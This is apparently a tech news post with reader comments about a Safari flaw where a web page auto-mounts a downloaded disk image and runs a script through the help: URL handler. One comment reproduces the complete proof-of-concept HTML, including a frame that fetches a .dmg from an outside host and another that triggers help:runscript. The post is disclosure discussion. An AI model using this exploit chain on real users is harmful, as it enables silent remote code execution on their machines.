Safari Falls Victim to Remote Code Exploit

A user writes, "A new vulnerability has been found in Mac OS X's Safari, which will launch Help.app and run an arbitrary script with a URL like 'help:runscript=...', assuming a known path (which is possible when Safari is set to automount disk images (which is the default)). A nice working demonstration is available on insecure.ws while the incident has been reported on Full-Disclosure."

Been known since February

[p0ppe]

According to a forum post on MacNN, this has been known since February...

Re:Is this worth a story?

[mcgroarty]

"I don't know about you, but I don't always take a look at my status bar before I click on a link."

That's not really enough. A page can have a redirect to another page, or even have a tiny subframe that loads that "url" to execute a command to wipe out data.

Re:Is this worth a story?

[edalytical]

Oh, come on man. This is a big deal, and the user doesn't have to do anything special -- just visit a web page -- after that it is all automatic.

The prof of concept link in the article was very simple:

The linked file 0x04_test.html:
<html>
<head><title>Safari runscript remote execution: Proof of concept</title></head>
<frameset cols="1%, 99%">
<frame src="0x04_get.html">
<frame src="0x04_exec.html">
</frameset>
</html>

0x04_get.html:
<html>
<head>
<meta HTTP-EQUIV="refresh" content="0; URL=http://membres.lycos.fr/manzflash/0x04_script. dmg">
</head>
</html>

0x04_exec.html:
<html>
<head>
<meta HTTP-EQUIV="refresh" content="10; URL=help:runscript=MacHelp.help/Contents/Resources /English.lproj/shrd/OpnApp.scpt string='Volumes:0x04_script:0x04_script.term'">
</head>
<body>Please wait for the disk image to be downloaded and mounted, it will take a few seconds.
<br>The script will execute automatically afterwards.
<br><br><pre>If your line is too slow and the dmg take too much time to download, reload the page when it is done, as this cannot be checked.
</pre></body>
</html>

Basically the 0x04_test.html file retrieves two pages, the first 0x04_get.html automatically downloads and mounts a disk image containing one file which contains the payload. The other file 0x04_exec.html uses your browser and the help system to automatically execute the script in the disk image.

Of course the payload in the proof of concept is harmless although I only glanced at it and had not had time to study it. It appears to place a text file in your home directory and echo the text:

"You have been compromised. No harm have been done. Contents of this script can be found in 0x04_script.term on your desktop. You can delete the file owned.txt in your home directory. It was a remote code execution example by http://insecure.ws" &gt; owned.txt ; open owned.txt

Now exactly how this is not a big deal only you sir can know. But I for one am not taking this lightly as no one should -- especially Apple.

All html source courtesy of curl.

Changing the settings

[marklark]

Here's where you can get a utility that allows you to change these settings: More Internet - http://www.monkeyfood.com/software/moreInternet/

Other browsers also affected

[swotl]

The vulnerability was first discovered in Opera, and was later found to also exist in Konqueror of KDE fame. Since Safari is based on the Konqueror code, that's probably where it came from.